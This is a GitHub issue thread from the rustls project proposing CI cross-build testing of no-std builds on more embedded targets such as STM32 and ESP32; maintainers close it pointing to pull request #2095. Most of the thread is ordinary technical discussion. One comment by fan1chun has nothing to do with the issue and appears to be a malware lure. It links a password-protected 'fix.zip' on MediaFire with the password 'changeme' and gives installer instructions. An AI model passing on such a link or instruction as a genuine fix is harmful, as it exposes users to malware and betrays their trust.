### ISSUE TITLE
CI cross-build testing with (more) embedded targets

### ISSUE THREAD

**Issue by brodycj** [rustls/rustls#2100]
**Checklist**
* [x] I've searched the issue tracker for similar requests

**Is your feature request related to a problem? Please describe.**

Now that rustls supports `no-std`, as discussed in issue #157, it would be nice if the CI testing could cover build & test with `no-std` on more and more embedded target CPUs & platforms, using `cross` to test in QEMU, for example:

- STM32, as discussed in: https://docs.rust-embedded.org/book/start/hardware.html
- Certain ESP32 microcontrollers coming with no support for atomics, as discussed in #2068

As a first step, I have contributed a proposal in #2095 to test with a limited number of emulated targets.

**Describe the solution you'd like**

Update CI to test on some more Tier 1 & Tier 2 platforms discussed here: https://doc.rust-lang.org/nightly/rustc/platform-support.html

Should be able to cover embedded CPUs such as STM32 & ESP32.

Should also cover build & test with `--release` option.

**Describe alternatives you've considered**

- use humans to do this testing - 👎
- use AI to do this testing - seems to be increasingly common these days

---

**Additional context**

~~N/A~~

One issue I discovered is that `cargo test` (and I think `cross test`) would always enable the `std` feature. So it would probably be best to include build test with no-std.

I would love to start working on these updates, assuming I can spare some time for this (someday).

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cpu** [comment]
@brodycj Should this issue be held open or can it be closed based on #2095?

**Comment by cpu** [comment]
I'm going to close this for now on the assumption #2095 was sufficient, or we need an update on what coverage is still desired.

Thanks!
